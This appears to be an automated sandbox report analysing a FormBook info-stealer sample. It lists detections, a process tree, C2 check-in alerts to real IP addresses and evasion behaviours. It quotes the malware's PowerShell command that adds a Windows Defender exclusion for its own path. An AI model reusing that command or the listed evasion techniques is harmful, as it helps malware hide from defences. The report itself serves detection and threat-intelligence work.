Edit tour

Windows Analysis Report
A4mmSHCUi2.exe

Overview

General Information

Sample name:	A4mmSHCUi2.exe renamed because original name is a hash value
Original sample name:	53becf41ba02fdbc491515ba9cf6cc96.exe
Analysis ID:	1547300
MD5:	53becf41ba02fdbc491515ba9cf6cc96
SHA1:	88533f5d751e62ef83170c3081bbc4f2b9783996
SHA256:	f5de23b1693c6872f53f4925775cfeac355a619a0813c603929221aa69513b38
Tags:	32exetrojan
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Found direct / indirect Syscall (likely to bypass EDR)

Injects a PE file into a foreign processes

Loading BitLocker PowerShell Module

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses nslookup.exe to query domains

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

A4mmSHCUi2.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\A4mmSHCUi2.exe" MD5: 53BECF41BA02FDBC491515BA9CF6CC96)

powershell.exe (PID: 7448 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A4mmSHCUi2.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7600 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

A4mmSHCUi2.exe (PID: 7456 cmdline: "C:\Users\user\Desktop\A4mmSHCUi2.exe" MD5: 53BECF41BA02FDBC491515BA9CF6CC96)

A4mmSHCUi2.exe (PID: 7484 cmdline: "C:\Users\user\Desktop\A4mmSHCUi2.exe" MD5: 53BECF41BA02FDBC491515BA9CF6CC96)

wioTZtEQwu.exe (PID: 4908 cmdline: "C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

nslookup.exe (PID: 8020 cmdline: "C:\Windows\SysWOW64\nslookup.exe" MD5: 9D2EB13476B126CB61B12CDD03C7DCA6)

wioTZtEQwu.exe (PID: 2124 cmdline: "C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)

firefox.exe (PID: 8152 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000B.00000002.4108291981.00000000033C0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000C.00000002.4110076229.0000000005580000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.4108473621.0000000003530000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1984553272.00000000016A0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1984164195.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000005.00000002.1991690472.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0000000A.00000002.4108199784.0000000002480000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: A4mmSHCUi2.exe PID: 7256	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.A4mmSHCUi2.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
5.2.A4mmSHCUi2.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A4mmSHCUi2.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A4mmSHCUi2.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\A4mmSHCUi2.exe", ParentImage: C:\Users\user\Desktop\A4mmSHCUi2.exe, ParentProcessId: 7256, ParentProcessName: A4mmSHCUi2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A4mmSHCUi2.exe", ProcessId: 7448, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A4mmSHCUi2.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A4mmSHCUi2.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\A4mmSHCUi2.exe", ParentImage: C:\Users\user\Desktop\A4mmSHCUi2.exe, ParentProcessId: 7256, ParentProcessName: A4mmSHCUi2.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\A4mmSHCUi2.exe", ProcessId: 7448, ProcessName: powershell.exe

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-02T05:25:16.177203+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.4	49735	TCP
2024-11-02T05:25:54.601583+0100	2022930	1	A Network Trojan was detected	4.245.163.56	443	192.168.2.4	49742	TCP

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-02T05:25:43.881150+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49741	168.76.221.252	80	TCP
2024-11-02T05:26:07.731461+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49802	216.40.34.41	80	TCP
2024-11-02T05:26:21.324411+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49879	161.97.142.144	80	TCP
2024-11-02T05:26:34.902812+0100	2855465	1	A Network Trojan was detected	192.168.2.4	49956	188.114.97.3	80	TCP
2024-11-02T05:26:48.707068+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50023	194.58.112.174	80	TCP
2024-11-02T05:27:02.481983+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50027	13.248.169.48	80	TCP
2024-11-02T05:27:24.762928+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50031	162.240.81.18	80	TCP
2024-11-02T05:27:38.668963+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50035	162.0.211.143	80	TCP
2024-11-02T05:27:52.170530+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50039	76.223.67.189	80	TCP
2024-11-02T05:28:10.710645+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50043	13.248.169.48	80	TCP
2024-11-02T05:28:25.630419+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50047	154.23.184.185	80	TCP
2024-11-02T05:28:39.686494+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50051	172.67.217.184	80	TCP
2024-11-02T05:28:53.438834+0100	2855465	1	A Network Trojan was detected	192.168.2.4	50055	195.154.200.15	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-02T05:26:00.071063+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49758	216.40.34.41	80	TCP
2024-11-02T05:26:02.603393+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49773	216.40.34.41	80	TCP
2024-11-02T05:26:05.190524+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49789	216.40.34.41	80	TCP
2024-11-02T05:26:13.698036+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49836	161.97.142.144	80	TCP
2024-11-02T05:26:16.249712+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49852	161.97.142.144	80	TCP
2024-11-02T05:26:18.796878+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49865	161.97.142.144	80	TCP
2024-11-02T05:26:27.228092+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49913	188.114.97.3	80	TCP
2024-11-02T05:26:29.781867+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49925	188.114.97.3	80	TCP
2024-11-02T05:26:32.350794+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49940	188.114.97.3	80	TCP
2024-11-02T05:26:41.420729+0100	2855464	1	A Network Trojan was detected	192.168.2.4	49990	194.58.112.174	80	TCP
2024-11-02T05:26:43.582589+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50003	194.58.112.174	80	TCP
2024-11-02T05:26:46.157049+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50019	194.58.112.174	80	TCP
2024-11-02T05:26:54.590803+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50024	13.248.169.48	80	TCP
2024-11-02T05:26:57.136264+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50025	13.248.169.48	80	TCP
2024-11-02T05:26:59.836718+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50026	13.248.169.48	80	TCP
2024-11-02T05:27:17.107899+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50028	162.240.81.18	80	TCP
2024-11-02T05:27:19.664499+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50029	162.240.81.18	80	TCP
2024-11-02T05:27:22.189903+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50030	162.240.81.18	80	TCP
2024-11-02T05:27:31.044330+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50032	162.0.211.143	80	TCP
2024-11-02T05:27:33.551012+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50033	162.0.211.143	80	TCP
2024-11-02T05:27:36.115837+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50034	162.0.211.143	80	TCP
2024-11-02T05:27:44.462436+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50036	76.223.67.189	80	TCP
2024-11-02T05:27:47.942774+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50037	76.223.67.189	80	TCP
2024-11-02T05:27:50.489473+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50038	76.223.67.189	80	TCP
2024-11-02T05:28:03.063156+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50040	13.248.169.48	80	TCP
2024-11-02T05:28:05.609929+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50041	13.248.169.48	80	TCP
2024-11-02T05:28:08.112933+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50042	13.248.169.48	80	TCP
2024-11-02T05:28:17.398487+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50044	154.23.184.185	80	TCP
2024-11-02T05:28:20.020721+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50045	154.23.184.185	80	TCP
2024-11-02T05:28:22.708255+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50046	154.23.184.185	80	TCP
2024-11-02T05:28:32.043665+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50048	172.67.217.184	80	TCP
2024-11-02T05:28:34.616508+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50049	172.67.217.184	80	TCP
2024-11-02T05:28:37.140492+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50050	172.67.217.184	80	TCP
2024-11-02T05:28:45.834442+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50052	195.154.200.15	80	TCP
2024-11-02T05:28:48.382682+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50053	195.154.200.15	80	TCP
2024-11-02T05:28:50.828441+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50054	195.154.200.15	80	TCP
2024-11-02T05:29:00.786551+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50056	103.191.208.137	80	TCP
2024-11-02T05:29:03.708504+0100	2855464	1	A Network Trojan was detected	192.168.2.4	50057	103.191.208.137	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: A4mmSHCUi2.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: A4mmSHCUi2.exe	ReversingLabs: Detection: 60%
Source: A4mmSHCUi2.exe	Virustotal: Detection: 37%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 5.2.A4mmSHCUi2.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.A4mmSHCUi2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.4108291981.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.4110076229.0000000005580000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4108473621.0000000003530000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1984553272.00000000016A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1984164195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4107110027.0000000002EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1991690472.0000000001ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.4108199784.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: A4mmSHCUi2.exe

Joe Sandbox ML: detected

Source: A4mmSHCUi2.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: A4mmSHCUi2.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: nslookup.pdb source: A4mmSHCUi2.exe, 00000005.00000002.1984668325.0000000001740000.00000004.00000020.00020000.00000000.sdmp, A4mmSHCUi2.exe, 00000005.00000002.1984668325.0000000001728000.00000004.00000020.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000A.00000002.4107678464.0000000000958000.00000004.00000020.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000A.00000002.4107678464.000000000097A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: nslookup.pdbGCTL source: A4mmSHCUi2.exe, 00000005.00000002.1984668325.0000000001740000.00000004.00000020.00020000.00000000.sdmp, A4mmSHCUi2.exe, 00000005.00000002.1984668325.0000000001728000.00000004.00000020.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000A.00000002.4107678464.0000000000958000.00000004.00000020.00020000.00000000.sdmp, wioTZtEQwu.exe, 0000000A.00000002.4107678464.000000000097A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: wioTZtEQwu.exe, 0000000A.00000000.1906199716.000000000077E000.00000002.00000001.01000000.0000000C.sdmp, wioTZtEQwu.exe, 0000000C.00000000.2054498010.000000000077E000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: wntdll.pdbUGP source: A4mmSHCUi2.exe, 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 0000000B.00000003.1984134279.0000000003421000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 0000000B.00000003.1987692730.00000000035D1000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: A4mmSHCUi2.exe, A4mmSHCUi2.exe, 00000005.00000002.1986394756.0000000001B80000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, nslookup.exe, 0000000B.00000002.4108652203.000000000391E000.00000040.00001000.00020000.00000000.sdmp, nslookup.exe, 0000000B.00000003.1984134279.0000000003421000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 0000000B.00000003.1987692730.00000000035D1000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 0000000B.00000002.4108652203.0000000003780000.00000040.00001000.00020000.00000000.sdmp

Source: C:\Windows\SysWOW64\nslookup.exe

Code function: 11_2_02EBC400 FindFirstFileW,FindNextFileW,FindClose,

11_2_02EBC400

Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 4x nop then jmp 0762A0A6h	0_2_0762979C
Source: C:\Users\user\Desktop\A4mmSHCUi2.exe	Code function: 4x nop then jmp 0762A0A6h	0_2_0762979C
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 4x nop then xor eax, eax	11_2_02EA9DB0
Source: C:\Windows\SysWOW64\nslookup.exe	Code function: 4x nop then mov ebx, 00000004h	11_2_036304E0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49741 -> 168.76.221.252:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49802 -> 216.40.34.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49773 -> 216.40.34.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 216.40.34.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49836 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49879 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49852 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49865 -> 161.97.142.144:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49789 -> 216.40.34.41:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49913 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49925 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49956 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49940 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49990 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50003 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50039 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50035 -> 162.0.211.143:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 162.240.81.18:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50023 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50031 -> 162.240.81.18:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50051 -> 172.67.217.184:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50026 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50043 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 154.23.184.185:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 154.23.184.185:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50037 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50047 -> 154.23.184.185:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50050 -> 172.67.217.184:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50053 -> 195.154.200.15:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50034 -> 162.0.211.143:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50027 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50048 -> 172.67.217.184:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50038 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50052 -> 195.154.200.15:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50042 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50049 -> 172.67.217.184:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50055 -> 195.154.200.15:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 195.154.200.15:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 162.0.211.143:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50019 -> 194.58.112.174:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 76.223.67.189:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50056 -> 103.191.208.137:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 162.240.81.18:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50030 -> 162.240.81.18:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50046 -> 154.23.184.185:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 162.0.211.143:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 103.191.208.137:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.030002107.xyz

Uses nslookup.exe to query domains

Source: C:\Program Files (x86)\RhRPFOawgYIJSnKXgsutmvHcAurWCAYfPzdwFoYOBJtkTzVXg\wioTZtEQwu.exe	Process created: C:\Windows\SysWOW64\nslookup.exe "C:\Windows\SysWOW64\nslookup.exe"
